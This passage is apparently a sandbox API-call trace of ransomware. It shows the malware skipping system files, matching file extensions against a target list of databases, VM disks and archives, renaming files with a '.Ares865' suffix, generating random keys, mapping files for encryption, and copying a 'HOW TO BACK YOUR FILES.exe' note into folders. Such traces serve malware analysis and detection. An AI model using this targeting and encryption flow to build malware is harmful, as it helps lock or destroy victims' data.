lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x440, lpName=0x0) returned 0x15c [0092.341] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x440) returned 0x190000 [0092.342] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.342] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.342] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.343] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.343] CloseHandle (hObject=0x15c) returned 1 [0092.343] CloseHandle (hObject=0x118) returned 1 [0092.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.344] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0092.344] lstrcmpiW (lpString1="Help.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="aoldtz.exe") returned 1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2=".") returned 1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="..") returned 1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="windows") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="bootmgr") returned 1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="temp") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="pagefile.sys") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="boot") returned 1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="ids.txt") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="perflogs") returned -1 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2="MSBuild") returned -1 [0092.345] lstrlenW (lpString="Help.lnk") returned 8 [0092.345] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Desktop.ini") returned 73 [0092.345] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Help.lnk" | out: lpString1="Help.lnk") returned="Help.lnk" [0092.345] lstrlenW (lpString="Help.lnk") returned 8 [0092.345] lstrlenW (lpString="Ares865") returned 7 [0092.345] lstrcmpiW (lpString1="elp.lnk", lpString2="Ares865") returned 1 [0092.345] lstrlenW (lpString=".dll") returned 4 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2=".dll") returned 1 [0092.345] lstrlenW (lpString=".lnk") returned 4 [0092.345] lstrcmpiW (lpString1="Help.lnk", lpString2=".lnk") returned 1 [0092.352] lstrlenW (lpString=".ini") returned 4 [0092.352] lstrcmpiW (lpString1="Help.lnk", lpString2=".ini") returned 1 [0092.352] lstrlenW (lpString=".sys") returned 4 [0092.352] lstrcmpiW (lpString1="Help.lnk", lpString2=".sys") returned 1 [0092.352] lstrlenW (lpString="Help.lnk") returned 8 [0092.352] lstrlenW (lpString="bak") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.352] lstrlenW (lpString="ba_") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.352] lstrlenW (lpString="dbb") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.352] lstrlenW (lpString="vmdk") returned 4 [0092.352] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.352] lstrlenW (lpString="rar") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.352] lstrlenW (lpString="zip") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.352] lstrlenW (lpString="tgz") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.352] lstrlenW (lpString="vbox") returned 4 [0092.352] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.352] lstrlenW (lpString="vdi") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.352] lstrlenW (lpString="vhd") returned 3 [0092.352] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.353] lstrlenW (lpString="vhdx") returned 4 [0092.353] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.353] lstrlenW (lpString="avhd") returned 4 [0092.353] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.353] lstrlenW (lpString="db") returned 2 [0092.353] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.353] lstrlenW (lpString="db2") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.353] lstrlenW (lpString="db3") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.353] lstrlenW (lpString="dbf") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.353] lstrlenW (lpString="mdf") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.353] lstrlenW (lpString="mdb") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.353] lstrlenW (lpString="sql") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.353] lstrlenW (lpString="sqlite") returned 6 [0092.353] lstrcmpiW (lpString1="lp.lnk", lpString2="sqlite") returned -1 [0092.353] lstrlenW (lpString="sqlite3") returned 7 [0092.353] lstrcmpiW (lpString1="elp.lnk", lpString2="sqlite3") returned -1 [0092.353] lstrlenW (lpString="sqlitedb") returned 8 [0092.353] lstrlenW (lpString="xml") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.353] lstrlenW (lpString="$er") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.353] lstrlenW (lpString="4dd") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.353] lstrlenW (lpString="4dl") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.353] lstrlenW (lpString="^^^") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.353] lstrlenW (lpString="abs") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.353] lstrlenW (lpString="abx") returned 3 [0092.353] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.354] lstrlenW (lpString="accdb") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accdb") returned 1 [0092.354] lstrlenW (lpString="accdc") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accdc") returned 1 [0092.354] lstrlenW (lpString="accde") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accde") returned 1 [0092.354] lstrlenW (lpString="accdr") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accdr") returned 1 [0092.354] lstrlenW (lpString="accdt") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accdt") returned 1 [0092.354] lstrlenW (lpString="accdw") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accdw") returned 1 [0092.354] lstrlenW (lpString="accft") returned 5 [0092.354] lstrcmpiW (lpString1="p.lnk", lpString2="accft") returned 1 [0092.354] lstrlenW (lpString="adb") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.354] lstrlenW (lpString="adb") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.354] lstrlenW (lpString="ade") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.354] lstrlenW (lpString="adf") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.354] lstrlenW (lpString="adn") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.354] lstrlenW (lpString="adp") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.354] lstrlenW (lpString="alf") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.354] lstrlenW (lpString="ask") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.354] lstrlenW (lpString="btr") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.354] lstrlenW (lpString="cat") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.354] lstrlenW (lpString="cdb") returned 3 [0092.354] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.354] lstrlenW (lpString="ckp") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.355] lstrlenW (lpString="cma") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.355] lstrlenW (lpString="cpd") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.355] lstrlenW (lpString="dacpac") returned 6 [0092.355] lstrcmpiW (lpString1="lp.lnk", lpString2="dacpac") returned 1 [0092.355] lstrlenW (lpString="dad") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.355] lstrlenW (lpString="dadiagrams") returned 10 [0092.355] lstrlenW (lpString="daschema") returned 8 [0092.355] lstrlenW (lpString="db-journal") returned 10 [0092.355] lstrlenW (lpString="db-shm") returned 6 [0092.355] lstrcmpiW (lpString1="lp.lnk", lpString2="db-shm") returned 1 [0092.355] lstrlenW (lpString="db-wal") returned 6 [0092.355] lstrcmpiW (lpString1="lp.lnk", lpString2="db-wal") returned 1 [0092.355] lstrlenW (lpString="dbc") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.355] lstrlenW (lpString="dbs") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.355] lstrlenW (lpString="dbt") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.355] lstrlenW (lpString="dbv") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.355] lstrlenW (lpString="dbx") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.355] lstrlenW (lpString="dcb") returned 3 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.355] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.356] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.356] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.356] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.356] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865") returned 78 [0092.356] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\help.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\help.lnk.ares865"), dwFlags=0x1) returned 1 [0092.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\help.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0092.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.358] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.359] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.359] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.359] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x15c [0092.363] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0092.365] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.366] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.366] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.366] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.366] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.367] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.367] CloseHandle (hObject=0x15c) returned 1 [0092.367] CloseHandle (hObject=0x118) returned 1 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.367] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0ebd60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.367] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.367] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0ebd60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0092.367] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.367] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0092.367] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools" [0092.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0092.368] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0092.368] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools") returned 70 [0092.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools" [0092.368] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.368] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.368] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.368] GetLastError () returned 0x0 [0092.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.368] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.369] CloseHandle (hObject=0x120) returned 1 [0092.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.369] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.369] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.369] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.369] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.369] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.369] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.370] lstrlenW (lpString="desktop.ini") returned 11 [0092.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\*") returned 72 [0092.370] lstrcpyW (in: lpString1=0x2cce48e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.370] lstrlenW (lpString="desktop.ini") returned 11 [0092.370] lstrlenW (lpString="Ares865") returned 7 [0092.370] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.370] lstrlenW (lpString=".dll") returned 4 [0092.370] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.370] lstrlenW (lpString=".lnk") returned 4 [0092.370] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.370] lstrlenW (lpString=".ini") returned 4 [0092.370] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.370] lstrlenW (lpString=".sys") returned 4 [0092.370] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.370] lstrlenW (lpString="desktop.ini") returned 11 [0092.370] lstrlenW (lpString="bak") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.370] lstrlenW (lpString="ba_") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.370] lstrlenW (lpString="dbb") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.370] lstrlenW (lpString="vmdk") returned 4 [0092.370] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.370] lstrlenW (lpString="rar") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.370] lstrlenW (lpString="zip") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.370] lstrlenW (lpString="tgz") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.370] lstrlenW (lpString="vbox") returned 4 [0092.370] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.370] lstrlenW (lpString="vdi") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.370] lstrlenW (lpString="vhd") returned 3 [0092.370] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.370] lstrlenW (lpString="vhdx") returned 4 [0092.371] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.371] lstrlenW (lpString="avhd") returned 4 [0092.371] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.371] lstrlenW (lpString="db") returned 2 [0092.371] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.371] lstrlenW (lpString="db2") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.371] lstrlenW (lpString="db3") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.371] lstrlenW (lpString="dbf") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 